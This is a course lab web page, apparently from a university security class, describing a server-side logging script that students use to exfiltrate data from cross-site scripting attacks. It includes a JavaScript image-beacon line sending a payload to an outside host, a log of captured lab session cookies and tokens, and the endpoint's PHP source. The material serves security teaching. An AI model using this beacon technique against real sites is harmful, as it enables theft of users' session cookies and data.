Lab 4 Logging Script

You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:

Tue, 22 Apr 2025 09:55:45 -0400: lab4-exchallengepayload: XYCYKXZSDEXJ
Tue, 22 Apr 2025 09:55:25 -0400: lab4-ex9payload: grader/GSHBTDXDVCJZ
Tue, 22 Apr 2025 09:55:14 -0400: lab4-ex8payload: grader/GWZKDJNWMTAA
Tue, 22 Apr 2025 09:54:43 -0400: lab4-ex5payload: PyZoobarLogin=grader#8ff2d199a71da09b420b7ee66a2ae9a3e74f1a3712c5b3ab76e2bed4dcf4d2ef
Tue, 22 Apr 2025 09:54:33 -0400: lab4-ex4payload: PyZoobarLogin=grader#733fc3ccd26d33c9265ce978ba66d0f77d37ae6e31ed2b0ec6e5788aebafc406
Tue, 22 Apr 2025 09:54:15 -0400: lab4-ex2payload: PyZoobarLogin=grader#6dfc6f6e701962c9a5d1dba16a2a1be9093bc05d0c31c53d95306425cafa6c01
Tue, 22 Apr 2025 09:51:27 -0400: lab4-exchallengepayload: MKLHFKDRNREO
Tue, 22 Apr 2025 09:51:09 -0400: lab4-ex9payload: grader/JDSTAXVMLCKY
Tue, 22 Apr 2025 09:50:57 -0400: lab4-ex8payload: grader/QWEXAWJIJUCU
Tue, 22 Apr 2025 09:46:55 -0400: lab4-exchallengepayload: EKWTNCAJONEX
Tue, 22 Apr 2025 09:46:36 -0400: lab4-ex9payload: grader/AKXOUTCPTMYQ
Tue, 22 Apr 2025 09:46:25 -0400: lab4-ex8payload: grader/FRGSTMLXCHHT
Tue, 22 Apr 2025 09:45:55 -0400: lab4-ex5payload: PyZoobarLogin=grader#296d03fd90b47278a1f0e0308003c9658a2c769687f9ed5ed68cab7fa1b75a1a
Tue, 22 Apr 2025 09:45:45 -0400: lab4-ex4payload: PyZoobarLogin=grader#b180d567ad839d9185541103acfeef784e46cf0ac928405642ab9ac973368ce0
Tue, 22 Apr 2025 09:45:20 -0400: lab4-ex2payload: PyZoobarLogin=grader#3838ec30c457c977612ea8474974fa0b940d9a57387d0c3376518a5ab6d9128d
Tue, 22 Apr 2025 09:42:10 -0400: lab4-exchallengepayload: WPUHWQXDNFCT
Tue, 22 Apr 2025 09:41:51 -0400: lab4-ex9payload: grader/QKGZHNJQVXMZ
Tue, 22 Apr 2025 09:41:39 -0400: lab4-ex8payload: grader/GJGGXKQCFIMJ
Tue, 22 Apr 2025 09:41:08 -0400: lab4-ex5payload: PyZoobarLogin=grader#3a0a8562f32457c72d4997e0034ca507e05856ed12f8ebe686825fc0e2db98c6
Tue, 22 Apr 2025 09:40:59 -0400: lab4-ex4payload: PyZoobarLogin=grader#48500c82405105bfa871ba3ebf31147e33b89ac79d762d51a41d96fc4e66146e
Tue, 22 Apr 2025 09:40:20 -0400: lab4-ex2payload: PyZoobarLogin=grader#bc06db58e7f9396bd5f9935044169749c4c4372e59d5873c7a08fcbccebb8829
Tue, 22 Apr 2025 03:58:24 -0400: lab4-exchallengepayload: YGOQFRIRDDQO
Tue, 22 Apr 2025 03:58:02 -0400: lab4-ex9payload: grader/JPIVDPUTHXZW
Tue, 22 Apr 2025 03:57:49 -0400: lab4-ex8payload: grader/VPSFBREURZGD
Tue, 22 Apr 2025 02:49:08 -0400: lab4-ex9payload: grader/XUFIDRBOAAHN
Tue, 22 Apr 2025 02:48:55 -0400: lab4-ex8payload: grader/PNHGGIKSDVWJ
Tue, 22 Apr 2025 02:46:20 -0400: lab4-ex9payload: grader/GKILSQFJTZQD
Tue, 22 Apr 2025 02:46:08 -0400: lab4-ex8payload: grader/QSNJHEEAJFQG
Tue, 22 Apr 2025 02:22:14 -0400: lab4-ex8payload: grader/YQPTPFCJSYYA
Tue, 22 Apr 2025 01:41:11 -0400: lab4-ex5payload: PyZoobarLogin=grader#cd4555bf7c74a2c62d95bda3aa53007e7474e43ff47eb5b815aeea375a069e37
Tue, 22 Apr 2025 01:41:01 -0400: lab4-ex4payload: PyZoobarLogin=grader#25bab4d7bfec108e5c89e8475aba9648f8bfe55ddd6cda59e155700a67ec1632
Tue, 22 Apr 2025 01:40:37 -0400: lab4-ex2payload: PyZoobarLogin=grader#99fcc949a722438cbc7fa1bb9efc36881f4656771c93803a2c7b247b94c70e71
Tue, 22 Apr 2025 01:37:48 -0400: lab4-ex4payload: PyZoobarLogin=grader#87a010fb3eff66fa1074e7d7c1f0b87fbce2094f96c75a24aa7eaf50944b6b85
Tue, 22 Apr 2025 01:37:27 -0400: lab4-ex2payload: PyZoobarLogin=grader#40583ec3e8e9fd2fc167783530feed762e708936c9cdb4a075303b7b7d76fd41
Tue, 22 Apr 2025 01:21:47 -0400: lab4-ex4payload: PyZoobarLogin=grader#ed836d1fb5d52f1d48c54dd2049c08d7fd27018b366db564238961a55e1e34ad
Tue, 22 Apr 2025 01:21:25 -0400: lab4-ex2payload: PyZoobarLogin=grader#52cfb9e1d812ff1bc3dfe9a5e5c7ad9937f9abe4a1ea3dcf33b67895fe81bbf2
Tue, 22 Apr 2025 00:46:54 -0400: lab4-ex4payload: PyZoobarLogin=grader#9c27c40e1ff8ee9b2638aebf34c43063a5ebc0d8e1b3ec821ae705c7d82fa693
Tue, 22 Apr 2025 00:44:31 -0400: lab4-ex4payload: PyZoobarLogin=t#234c516024067f93fe8ea62e84c031df6b118ddc758880fe40a4b90ef194cc4b
Tue, 22 Apr 2025 00:42:40 -0400: test: test-payload
Tue, 22 Apr 2025 00:18:42 -0400: lab4-ex2payload: PyZoobarLogin=grader#13a85c77b489a91ebb2cf5afd2feb3b11f9083d701f7a8572cec2101c4648a5d
Tue, 22 Apr 2025 00:14:48 -0400: lab4-ex2payload: PyZoobarLogin=grader#71d50bdea9fc7a5100a5a727955db4ff88721e1f4e423a3baebdc281fa6b0d0c
Tue, 22 Apr 2025 00:10:02 -0400: lab4-ex2payload: PyZoobarLogin=grader#3d8e94f0ffee487fea9baa6791a7b54c27ede50753c9144d5e81cc6153dbd0cb
Mon, 21 Apr 2025 23:59:37 -0400: lab4-ex2payload: PyZoobarLogin=grader#d3030891a0d8824eb5ee72b25463e2aeaa7e988fa938555ad208514a943e6db2
Mon, 21 Apr 2025 23:57:25 -0400: lab4-ex2payload: PyZoobarLogin=grader#0377a470023cc445f24b27abd9c86fd32c88283cafe8775debfda071a10d7dd9
Mon, 21 Apr 2025 22:51:53 -0400: some identifier: information
Mon, 14 Apr 2025 10:21:36 -0400: student: grader/VLKWGKKGNNNV
Mon, 14 Apr 2025 10:21:26 -0400: student: grader/CXUQKITXKUBO
Mon, 14 Apr 2025 10:20:56 -0400: student: PyZoobarLogin=grader#31dcf27a3fa457790ca5fedd17a9b05107ce2d90853763246f1996b38f2fae51
Mon, 14 Apr 2025 10:20:47 -0400: student: PyZoobarLogin=grader#727ebd37b884df8d248e06ed104c7b05e2d0bc042c7cb452d48733ccdd39da64
Mon, 14 Apr 2025 10:20:27 -0400: student: PyZoobarLogin=grader#9b65a8fac42f503d699c26944786b49dfdf9890fef623faf2d999db230affb5a
Mon, 14 Apr 2025 09:10:19 -0400: student: 123456
Mon, 14 Apr 2025 09:04:10 -0400: my-username: some-string
Mon, 14 Apr 2025 08:40:46 -0400: student: grader/QIJGUCSHNGCO
Mon, 14 Apr 2025 08:40:37 -0400: student: grader/XJGFZQEUFGIW
Mon, 14 Apr 2025 08:40:09 -0400: student: PyZoobarLogin=grader#b1f742deb4a6b2f0e0283881c75b4d812310f0a9ed70d04aa576b745f45e823e
Mon, 14 Apr 2025 08:40:01 -0400: student: PyZoobarLogin=grader#e8d532a9cd808743355b2271f6f265273024f21e666f5dea0a0cc182fbac84fd
Mon, 14 Apr 2025 08:39:44 -0400: student: PyZoobarLogin=grader#b9df0b001c628e05b5fca27a63383e47587a3ad8898c349ae75d7e03559f129c
Mon, 14 Apr 2025 07:30:56 -0400: student: grader/JEECLJHLUIZO
Mon, 14 Apr 2025 07:30:47 -0400: student: grader/ELUALIDWQLYS
Mon, 14 Apr 2025 07:30:19 -0400: student: PyZoobarLogin=grader#2c8ad1567de62b8965141eb6efc745dcf472fd4528c32ab8fcef77ea6c457840
Mon, 14 Apr 2025 07:30:10 -0400: student: PyZoobarLogin=grader#bd99b088e689b10464eb33ad641db889fdef3b87433f96fd2f6d2879dca90f83
Mon, 14 Apr 2025 07:29:51 -0400: student: PyZoobarLogin=grader#43ddb30ac1b758e99560f8b2d8ed1065de102a40aa020ae9326fd3bf7786e878
Mon, 14 Apr 2025 07:27:33 -0400: student: grader/SHCTSVNEURHN
Mon, 14 Apr 2025 07:27:23 -0400: student: grader/OJCSFNGBKWGD
Mon, 14 Apr 2025 07:26:55 -0400: student: PyZoobarLogin=grader#ce1fef1ef165ca9b32e32d856b58632f4820d621415d466cfa3463188b982fbc
Mon, 14 Apr 2025 07:26:45 -0400: student: PyZoobarLogin=grader#1e36d35f9eff8b5a82d29907e62896cd80beafa6356de25ba803e4e4cab51a26
Mon, 14 Apr 2025 07:26:26 -0400: student: PyZoobarLogin=grader#fc690fb48548e03b64e4f44b12e68c9d7599c51cc5a2db149be92d8735c6fb79
Mon, 14 Apr 2025 06:57:01 -0400: student: grader/DXHHILLCEUGU
Mon, 14 Apr 2025 06:56:54 -0400: student: grader/NHBTLYISALSR
Mon, 14 Apr 2025 06:56:36 -0400: student: PyZoobarLogin=grader#62474e933ea8e07af2c21ee274b1c916baa5310c6544a2b46b84f5beefbe22a8
Mon, 14 Apr 2025 06:56:29 -0400: student: PyZoobarLogin=grader#5c8fbadde04dfc519c5184b0816989ec4c16f2a572b5e2b20f14197573156e86
Mon, 14 Apr 2025 06:56:13 -0400: student: PyZoobarLogin=grader#208fe559813a032a9b25320d4e25323747a96454405c82e977a8b6c46d9d0771
Mon, 14 Apr 2025 06:51:25 -0400: student: PyZoobarLogin=grader#0bda2077b325db6b5cd59afcd5e8618ddf01b02e1eab265f2dfb9017448ef904
Mon, 14 Apr 2025 06:51:17 -0400: student: PyZoobarLogin=grader#112527fff893ea2e761dd31989b3c8642e7d7a9a2a94eb8f99fe2cbbbce69874
Mon, 14 Apr 2025 06:50:53 -0400: student: PyZoobarLogin=grader#905503b19cb9893d789a7e9c4a7f5d75a5713a73327cf294edffc058e6e569a1
Mon, 14 Apr 2025 06:30:09 -0400: student: grader/LQWQQUPAHITW
Mon, 14 Apr 2025 06:30:02 -0400: student: grader/QESZKNAANZCU
Mon, 14 Apr 2025 06:29:43 -0400: student: PyZoobarLogin=grader#0f61533164ec42da53edf92691fcad60e0f91313fa04299dd2d59bd4a8087b09
Mon, 14 Apr 2025 06:29:36 -0400: student: PyZoobarLogin=grader#a8bc645842bcea346530875dc413cda7e962c421765985943baf73126264ea29
Mon, 14 Apr 2025 06:29:20 -0400: student: PyZoobarLogin=grader#8e4c0bb39df4d25e14da65e49de92e8b22fb8fecd216ab8931eb96c69dd94be4
Mon, 14 Apr 2025 05:56:17 -0400: student: PyZoobarLogin=grader#dffa4a4263537aa141b174b5d48cdb85fcecd0fecce05a21d58094a51dee6f9d
Mon, 14 Apr 2025 05:56:01 -0400: student: PyZoobarLogin=grader#b312101a12bdc4afa42a35534f249965adfe2cf438e62268b97bea930a037e61
Mon, 14 Apr 2025 04:16:07 -0400: student: PyZoobarLogin=grader#36d73a9352b3299697e926cb4936c0ededfd4c1b6d891d3b7a130f4d2eb75b4a
Mon, 14 Apr 2025 03:53:45 -0400: student: grader/VQMLLHCPUENL
Mon, 14 Apr 2025 03:53:39 -0400: student: grader/QFKSQQOVNMBW
Mon, 14 Apr 2025 03:53:19 -0400: student: PyZoobarLogin=grader#014f4d85b61c0213e680a0d12b07b6b2f66e38a0604bd1ea09561f70ca76a3e2
Mon, 14 Apr 2025 03:53:12 -0400: student: PyZoobarLogin=grader#ddb285e508b953bef121aaf1841ac161c0160ffe0f079ab35e51bbb260a044f6
Mon, 14 Apr 2025 03:52:57 -0400: student: PyZoobarLogin=grader#a68d030e5db2b6abf876f7a2f7bfdd239472835f1073c5f701a7e9db51e3f989
Mon, 14 Apr 2025 03:45:58 -0400: student: grader/CLZZQESLQAJR
Mon, 14 Apr 2025 03:45:51 -0400: student: grader/LQGUXIACMKLP
Mon, 14 Apr 2025 03:45:31 -0400: student: PyZoobarLogin=grader#ba4968bf623a6617feb2fbbd4beceed8d36187efd6260a5f7d6a282b414b176a
Mon, 14 Apr 2025 03:45:24 -0400: student: PyZoobarLogin=grader#7b41f98e7cbdd75e4f4a2a7d2e80993c83a74533e3bce4ae4fdcc3e18526e49f
Mon, 14 Apr 2025 03:45:09 -0400: student: PyZoobarLogin=grader#2404866a74687dc190c678b7fe163dfd10fa221987bdea8c457419deccbc2719
Sun, 13 Apr 2025 10:21:11 -0400: student: grader/HJYTEXCKPDUV
Sun, 13 Apr 2025 10:21:03 -0400: student: grader/AIBOYPNHCPTW
Sun, 13 Apr 2025 10:20:45 -0400: student: PyZoobarLogin=grader#458a5ab3fdb8e49c26d88ac179a8f36ee36c14c397f697f1c60bd9b5affb107d
Sun, 13 Apr 2025 10:20:38 -0400: student: PyZoobarLogin=grader#ccc4202fdb0679187962beb1434bf87b58e4a7e07308b0815e89c183d5fe2321
Sun, 13 Apr 2025 10:20:23 -0400: student: PyZoobarLogin=grader#d0288f5b23d4d584d49d1903950cec9d3b3db42eb65cbeca2733e9a504d46ab9
Sun, 13 Apr 2025 10:18:54 -0400: student: grader/TELVSGBCECQU
Sun, 13 Apr 2025 10:18:47 -0400: student: grader/KJXAMDMMXRIO
Sun, 13 Apr 2025 10:18:28 -0400: student: PyZoobarLogin=grader#641610606998fc737f5562d61270e050129b769a629d8bdadf1a8448027d4912

Source code

In case you are curious, here is the source code of this page.

<?php
header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.566-2024-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
    </form>

    <h2>Logged entries</h2>
    <p>
        Below are the most recent logged entries, so that you can check
            if your attack worked:
    </p>

    <pre class="tty"><?php
        $lines = file_get_contents("/tmp/6.566-2024-logger.txt");
        echo htmlspecialchars($lines);
    ?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>